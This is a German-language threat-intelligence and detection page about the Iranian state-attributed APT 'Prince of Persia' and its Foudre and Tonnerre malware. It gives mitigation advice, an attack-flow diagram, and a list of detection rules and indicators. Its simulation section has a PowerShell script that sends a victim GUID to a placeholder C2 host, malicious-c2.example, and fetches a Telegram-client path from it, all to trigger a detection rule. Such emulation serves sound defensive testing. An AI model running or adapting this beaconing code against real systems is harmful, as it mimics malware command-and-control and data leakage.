Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht beschreibt das dem iranischen Staat zugeschriebene APT-Cluster namens Prince of Persia und verfolgt seine Entwicklung im letzten Jahrzehnt, wobei der Schwerpunkt auf der von 2023 bis 2025 beobachteten Aktivität liegt. Die Betreiber verlassen sich auf maßgeschneiderte Malwarefamilien – darunter Foudre, Tonnerre, MaxPinner, Rugissement und Deep Freeze –, um Spionage und systematischen Datendiebstahl zu unterstützen. Neuere Versionen führen Domänengenerierungsalgorithmen, Telegram-basierte Command-and-Control-Techniken und verschlüsselte SFX-Payloads ein, um die Widerstandsfähigkeit und Verschleierung zu verbessern. Die Zielobjekte umfassen kritische Infrastrukturen und Netzwerke mit dissidenten Beziehungen in mehreren Regionen.
Untersuchung
SafeBreach-Forscher verfolgten die Operationen der Gruppe ab 2019, sammelten neue Proben, dokumentierten C2-Architekturen und analysierten die DGA-Logik. Sie entschlüsselten geschützte Payloads, extrahierten Telegram-Bot-Anmeldeinformationen und erstellten einen Zeitplan der Varianten-Implementierungen. Die Forschung hebt separate Produktions- und Testinfrastrukturen hervor und beschreibt Dateidrop-Verhaltensweisen, die mit Excel-gesteuerten Infektionsketten verbunden sind. Indikatoren eines Kompromisses wurden aus Malware-Hashes, Domains und URLs zusammengetragen.
Abschwächung
Überwachen Sie die DNS-Aktivität auf die identifizierten DGA-Muster, blockieren Sie bekannte bösartige Domains und beschränken oder inspizieren Sie den mit Telegram-Bots verbundenen Datenverkehr. Fügen Sie Erkennungsmaßnahmen für die referenzierten Malware-Dateinamen und Loader-DLL-Artefakte hinzu und verwenden Sie die DNS-Überwachung/Sinkholing, um rotierende Infrastrukturen zu identifizieren. Erzwingen Sie die Zulassung von Anwendungen und erhöhen Sie die Sicherheit in Office, indem Sie Makros einschränken, um die Wahrscheinlichkeit eines Erstzugangs zu verringern.
Reaktion
Wenn ein Indikator gefunden wird, isolieren Sie das betroffene System, erfassen Sie flüchtige Beweise und führen Sie gezielte Forensik auf abgelegten Dateien und relevanten Registrierungspunkten durch. Blockieren Sie alle verlinkten Domains und IP-Adressen, rotieren Sie exponierte Telegram-Bot-Tokens und setzen Sie Anmeldeinformationen für betroffene Konten zurück. Suchen Sie umfassend nach den benutzerdefinierten Loader-DLL-Überresten und verschlüsselten SFX-Payloads, um vollständige Auslöschung sicherzustellen.
„graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ffcc99 classDef tool fill:#ffe699 classDef file fill:#ccffcc classDef process fill:#ffdddd classDef operator fill:#ff9900 %% Node definitions action_initial[„<b>Aktion</b> – <b>T1566.001 Spearphishing Anhang</b><br/>Opfer erhält bösartige Excel-Anhang“] class action_initial action file_excel[„<b>Datei</b> – Bösartiges Excel mit Makro<br/>Lädt ccupdate.tmp“] class file_excel file malware_foudre[„<b>Malware</b> – Foudre (ccupdate.tmp)<br/>Verschlüsseltes SFX-Payload“] class malware_foudre malware process_macro[„<b>Prozess</b> – Makroausführung“] class process_macro process action_execution[„<b>Aktion</b> – <b>T1204.002 Benutzerausführung: Bösartige Datei</b><br/>Opfer öffnet Excel“] class action_execution action action_obfuscation[„<b>Aktion</b> – <b>T1027.009 Eingebettete Payloads</b><br/>Payload verschlüsselt und getarnt“] class action_obfuscation action file_camDLL[„<b>Datei</b> – DLL als MP4-Video getarnt“] class file_camDLL file action_deobfuscate[„<b>Aktion</b> – <b>T1140 Entschlüsseln/Dekodieren von Dateien</b><br/>Entschlüsselt Payload mit festcodiertem Passwort“] class action_deobfuscate action process_decrypt[„<b>Prozess</b> – Entschlüsselungsroutine“] class process_decrypt process action_dga[„<b>Aktion</b> – <b>T1568.002 Dynamische Auflösung (DGA)</b><br/>Generiert Domains LOS1, FTS1, u2026“] class action_dga action process_dga[„<b>Prozess</b> – Domänengenerierungsalgorithmus“] class process_dga process action_webc2[„<b>Aktion</b> – <b>T1102.002 Webdienst bidirektionale Kommunikation</b><br/>HTTP GET mit GUID, Version, Benutzerinfo“] class action_webc2 action process_http[„<b>Prozess</b> – HTTP-Anfrage/-Antwort“] class process_http process action_telegram[„<b>Aktion</b> – Nutzung von Telegram Bot für C2“] class action_telegram action file_tga[„<b>Datei</b> – tga.adr (Telegram-Bot-Client)“] class file_tga file process_telegram[„<b>Prozess</b> – Kommunikation über Telegram-API mit Bot-Token“] class process_telegram process action_exfil[„<b>Aktion</b> – <b>T1041 Exfiltration über C2-Kanal</b><br/>Lädt gestohlene Dateien in C2-Verzeichnisse hoch“] class action_exfil action file_exfil[„<b>Datei</b> – Kodierte Dateinamen, verschlüsselter Inhalt“] class file_exfil file action_data_obfusc[„<b>Aktion</b> – <b>T1001 Datenverschleierung</b><br/>Speichert Exfil-Daten mit kodierten Namen und Verschlüsselung“] class action_data_obfusc action %% Connections showing flow action_initial u002du002d>|liefert| file_excel file_excel u002du002d>|lädt| malware_foudre malware_foudre u002du002d>|führt aus über| process_macro process_macro u002du002d>|führt zu| action_execution action_execution u002du002d>|löst aus| action_obfuscation action_obfuscation u002du002d>|verwendet| file_camDLL action_obfuscation u002du002d>|führt zu| action_deobfuscate action_deobfuscate u002du002d>|läuft| process_decrypt process_decrypt u002du002d>|erzeugt| malware_foudre malware_foudre u002du002d>|initiiert| action_dga action_dga u002du002d>|läuft| process_dga process_dga u002du002d>|löst auf zu| action_webc2 action_webc2 u002du002d>|verwendet| process_http process_http u002du002d>|lädt herunter| file_tga file_tga u002du002d>|ermöglicht| action_telegram action_telegram u002du002d>|verwendet| process_telegram process_telegram u002du002d>|exfiltriert über| action_exfil action_exfil u002du002d>|speichert als| file_exfil file_exfil u002du002d>|wendet an| action_data_obfusc „
Angriffsablauf
Erkennungen
Möglicher Missbrauch von Telegram als Command-and-Control-Kanal (über dns_query)
Ansicht
Mögliche Dateninfiltration / -exfiltration / C2 über Drittanbieterdienste / -tools (über Proxy)
Ansicht
Verdächtige Command-and-Control-Anfrage durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (über dns)
Ansicht
Verdächtige Taskkill-Ausführung (über cmdline)
Ansicht
IOCs (HashSha256) zur Erkennung: 18. DEZ. 2025 Prince of Persia: Ein Jahrzehnt iranischer staatlicher APT-Kampagnen unter der Lupe Teil 2
Ansicht
IOCs (SourceIP) zur Erkennung: 18. DEZ. 2025 Prince of Persia: Ein Jahrzehnt iranischer staatlicher APT-Kampagnen unter der Lupe
Ansicht
IOCs (HashSha256) zur Erkennung: 18. DEZ. 2025 Prince of Persia: Ein Jahrzehnt iranischer staatlicher APT-Kampagnen unter der Lupe Teil 1
Ansicht
IOCs (HashMd5) zur Erkennung: 18. DEZ. 2025 Prince of Persia: Ein Jahrzehnt iranischer staatlicher APT-Kampagnen unter der Lupe
Ansicht
IOCs (DestinationIP) zur Erkennung: 18. DEZ. 2025 Prince of Persia: Ein Jahrzehnt iranischer staatlicher APT-Kampagnen unter der Lupe
Ansicht
Erkennung von Foudre v34-Infektion über Excel-Datei mit eingebettetem ausführbaren Programm [Windows-Prozess-Erstellung]
Ansicht
Erkennung von Foudre- und Tonnerre-C2-Kommunikation [Windows-Netzwerkverbindung]
Ansicht
Simulation
Voraussetzung: Der Telemetrie- und Basisdaten-Pre‑Flight-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Gegnertechnik (T1584.005), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genau von der Erkennungslogik erwartete Telemetrie zu erzeugen.
-
Angriffsnarrativ und Befehle:
Der Bedrohungsakteur hat eine bösartige Domain eingerichtetmalicious-c2.exampledie den Foudre/Tonnerre-C2-Server hostet. Die Payload des Angreifers auf dem Opfercomputer führt zwei HTTP-GET-Anfragen aus:- Sendet die GUID des Opfers an den Foudre-C2-Endpunkt unter Verwendung des Pfads
/1/?c=<GUID>. - Kontaktiert die Telegram-API über die Tonnerre-Hintertür mit dem Pfad
/t/tga.adr.
Beide Anfragen werden über HTTP gesendet (um die Proxy-Protokollierung zu erleichtern) und beinhalten eine generische User-Agent, um sich in den normalen Datenverkehr zu mischen. Die Aktionen erzeugen die genauen Felder (
request_method=GET,urldie die Sigma-Regel überwacht. - Sendet die GUID des Opfers an den Foudre-C2-Endpunkt unter Verwendung des Pfads
-
Regressionstest-Skript:
# ------------------------------------------------------------ # Foudre & Tonnerre C2-Kommunikationssimulation (Windows) # ------------------------------------------------------------ # 1. Definieren Sie die GUID des Opfers (bei einer echten Infektion würde dies aus der Registrierung gelesen werden) $guid = (New-Guid).Guid # 2. Definieren Sie den bösartigen C2-Host (ersetzen Sie ihn durch eine von Ihnen kontrollierte Adresse zum Testen) $c2Host = "http://malicious-c2.example" # 3. Senden Sie die GUID an den Foudre-C2-Endpunkt $foudreUrl = "$c2Host/1/?c=$guid" Write-Host "[*] Senden der GUID an Foudre C2: $foudreUrl" Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing # 4. Kontaktieren Sie die Telegram-API über die Tonnerre-Hintertür $telegramUrl = "$c2Host/t/tga.adr" Write-Host "[*] Kontaktieren des Telegram-API-Endpunkts: $telegramUrl" Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Alarme."Das Skript ist eigenständig; wenn es auf einem Windows-Host ausgeführt wird, der den Datenverkehr über den konfigurierten Proxy leitet, werden zwei Protokolleinträge erzeugt, die den Bedingungen der Sigma-Regel entsprechen
url|containsBedingungen. -
Bereinigungskommandos:
# Entfernen Sie alle temporären Netzwerkverbindungen (nur relevant, wenn der Proxy dauerhafte Sitzungen erstellt) # Hier löschen wir einfach den DNS-Cache, um eine fortwährende Auflösung des bösartigen Hosts zu vermeiden. ipconfig /flushdns Write-Host "[*] Bereinigung abgeschlossen."